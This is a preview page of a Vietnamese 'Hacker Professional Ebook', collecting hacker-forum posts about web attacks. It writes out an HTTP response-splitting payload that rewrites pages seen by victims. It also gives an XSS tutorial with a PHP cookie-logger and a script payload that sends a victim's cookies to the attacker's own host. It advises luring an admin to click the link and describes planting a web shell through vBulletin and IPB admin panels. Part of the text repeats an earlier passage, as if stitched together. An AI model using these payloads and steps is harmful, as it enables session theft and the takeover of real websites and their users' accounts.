1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 270 ppt

6 67 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 152,16 KB

Nội dung

</head> <body> HTTP /1.1 200 OK Content-Type: text/html Content-Length: 19 &lt;html&gt;Shazam&lt;/html&gt; </body> </html> Nhìn kĩ code QUOTE %20 = spacebar %0d%0a = xuống 2 dòng (skip 2 line) Để tiện lợi hơn cho tấn công, xin giới thiệu một công cụ encode các kí tự trên URL http://horohoro.k7q1.com/HCE-URLencode.htm WinDak post Aug 25 2004, 04:38 PM IP: Private | Post #6| HCE-Group Group Icon Group: ** Tổng Tư Lệnh ** Posts: 14 Joined: 18-August 04 Member No.: 7 Warn: (0%) + Xin giải thích thêm: Kĩ thuật web response này sử dụng để thay đổi tạm thời trang web khi được gửi đến client, nó gần giống XSS , nhưng XSS ta chỉ có thể chèn script vào để ăn cắp cookie, còn với kĩ thuật này ta có thể thay đổi hoàn toàn nội dung trang web này CODE %0d%0aContent- Length:%200%0d%0aHTTP%20/1.1%20200%20OK%0d%0aContent- Type:%20text/html%d%aContent-Length:%2019%d%a<html>Shazam</html> Phần nằm trong <html></html> chính là website ta đã thay đổi, và khi victim click vào link CODE http://x.x.x.x/by_lang.jsp=English%0d%0aContent- Length:%200%0d%0aHTTP%20/1.1%20200%20OK%0d%0aContent- Type:%20text/html%d%aContent-Length:%2019%d%a<html>Shazam</html> nội dung victim nhìn thấy chỉ là đoạn trong <html></html> Không biết tôi nói thế có chính xác không hả horo ^^ v XSS căn bản Lâu không post bài nào , toàn chat chit spam vớ vẩn . Lục đống ebook thấy bài này khá hay , post lên cho các bạn tham khảo . Định viết luôn nhưng vì sợ các bạn bảo ăn cắp bản quyền nên post nguyên văn một bài viết của tác giả huythanh Trích: Ngày nay, trên Internet ko khó để thấy các bug mới về XSS. huythanh thấy ngứa tay ngứa chân khi ko làm được gì nên đã tìm hiểu kĩ về cái này. Vì mới tìm hiểu nên bài này hợp với newbie hơn . Ai copy nhớ cái copyright hộ nhá ** huythanh viết bài này sau khi đã tham khảo wa bài của Mask_NBTA . Hix nhớ bài này lúc trước vương vãi khắp nơi bi giờ tìm mún đỏ con mắt cũng ko có, may là in ra 1 bản rồi . Bài của huythanh sẽ tóm tắt và sửa 1 số lỗi nhỏ trong bài của mask, hix có mấy chỗ mò cả ngày mới ra . Anyway, cho gởi lời cảm ơn đặc biệt đến Mask Đầu tiên ta cần phân biệt là XSS <> CSS, cái nì có nhiều người lộn lắm CSS : Cascading Style Sheets XSS : Cross-Site Scripting *** Dấu hiệu nhận biết site mắc lỗi : Cách thông dụng nhất là chèn script vào các biến truyền trực tiếp trên address, các exploit thường dựa trên cái này Vd : http://sitebixss.com/index.php?act=[chèn xss vào đây] Cái [chèn xss vào đây] thì chẳng thấy ai nói tới cả , chắc ai cũng nghĩ người khác là siêu sao *** Cách chèn script : Ta dùng javascript để chèn vào, trước hết xem qua các hàm sau cho biết sơ sơ đã Bây giờ bạn vào 1 forum đi, vd ibf đi nhá ( thực hành ngay trên HCV cũng được ) Okie, log in vào và thay address bằng đoạn code sau đây, y chang nhá. Code: javascript:alert(document.cookie) Thấy gì nào ? Nó sẽ ra có dạng thế này. acpcollapseprefs=900,1000,1350; forum_read=a:1:{i:2;i:1122471452;}; session_id=64e939f642a0315bc3fb655f7ef36bf6; member_id=1; pass_hash=c561a5a3859a0df75f76d98ae67bc026 [ Đoạn trên đây thử trên localhost nên các bác đừng thử fake cookie nhe ] Rồi, nói nôm na là thế này, khi address của trình duyệt chính xác là 1 trang nào đó vd hcvteam.net thì lúc đó cookie của hcvteam.net sẽ được lưu tại trình duyệt với tên 1 biến là document.cookie Bây giờ chỉ cần tạo 1 file php để truyền biến này cho nó làm việc, thế là xong Code: javascript:location="http://hostcuaban/cookie.php?cookie="+(document.cookie) Hàm location để chuyển trình duyệt đến 1 trang khác, lưu ý lúc đó document.cookie sẽ thay bằng giá trị cookie, đó là chỗ tui thấy hay nhất. Nếu hiểu được tới đây thì chắc chẳng còn gì để nói . Sau đây là cách exploit. *** Cách exploit : Đầu tiên tạo file cookie.php thế này up lên host của bạn PHP Code: <? /*XSS Exploit */ /*PHP Cookie Saver */ /*Copyright by huythanhv2, HCVTEAM.NET */ $f=fopen(" xss.txt","a"); $cook=$HTTP_GET_VARS["cookie"]; fputs($f,$cook.chr(13)); fclose($f); header("location: http://DIACHIDEDUDO.DUDO"); ?> XSS giúp ta steal được cookie của victim, vì thế vd site bị xss thế này Code: http://sitexss.com/index.php?act=[xss] Chúng ta khai thác thế này: Code: http://sitexss.com/index.php?act=<script>location="http://hostcuaban.com/cookie. php?cookie="+(document.cookie) </script> Cookie victim sẽ lưu lại ở file xss.txt trên host của bạn Bây giờ chỉ còn việc dụ "Alert" admin vào link trên là nó chết , nhớ đổi cái DIACHIDEDUDO.DUDO lai thành site bạn muốn nó vào sau khi cookie đã lưu lại ( nhằm giảm sự nghi ngờ thôi ) *** Vài lưu ý : Đến đây là bạn có thể tự tin chơi XSS được rồi, đây là 3 điều nhỏ : 1/ Chỉ exploit được site nào có xài cookie, chứ "Alert" ACP của IBF dù nó có XSS 10000000 chỗ đi nữa thì cũng dek làm gì được ( nó xài session mà ) 2/ Nên develope cái file php 1 vài cái, như mail về chẳng hạn, để dễ quản lý hơn 3/ Về javascript, bài của Mask_NBTA dùng window.open, nhưng mà bi giờ xài cái đó chẳng khác gì tự sát vì "Alert" nào cũng chống popup cả nên huythanh upgrade nó lên location Hi vọng các bạn có thể hiểu được vì bài viết khá chi tiết , chưa hiểu chỗ nào post lên đây .Mod forum sẽ hướng dẫn cụ thể . Đọc xong bài này chắc các bạn cũng hiểu được cách mà người ta sử dụng với html injection trong vbb vừa qua . ( Tìm đọc thêm bài của navaro trong box này ) Posted by kecodoc(HCE) Cách up shelll ở IPB, VBB !!! Thấy bài này của longnhi post bên VN1 cũng hay, rất có ích cho newbie tham khảo, để tránh trường hợp các bạn cứ open topic hỏi các vấn đề này, nên tôi copy nó về HcE. Anh em nào có cách up shell khác có thể post trong topic này luôn. tks ================================================== ========= upshell thì tùy theo khả năng của mỗi người thôi, cái này nói chung chung hơi khó nhưng mà đối với VBB hay IPB thì tớ có thể giúp. (cái này tớ nói khi đã vào được admincp) +VBB: thằng này upshell rất đơn giản vào phần add plugin của VBB add thêm plugin mới và trong plugin này chứa đoạn code include shell Ex:include('link shell'); Chú ý là phải enable cái plugin trước và phải để cái plugin mới add ở chế độ active. +IPB:Thằng này hiện tại tớ có 3 cách up shell Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần . không hả horo ^^ v XSS căn bản Lâu không post bài nào , toàn chat chit spam vớ vẩn . Lục đống ebook thấy bài này khá hay , post lên cho các bạn tham khảo . Định viết luôn nhưng vì sợ các bạn

Ngày đăng: 04/07/2014, 12:20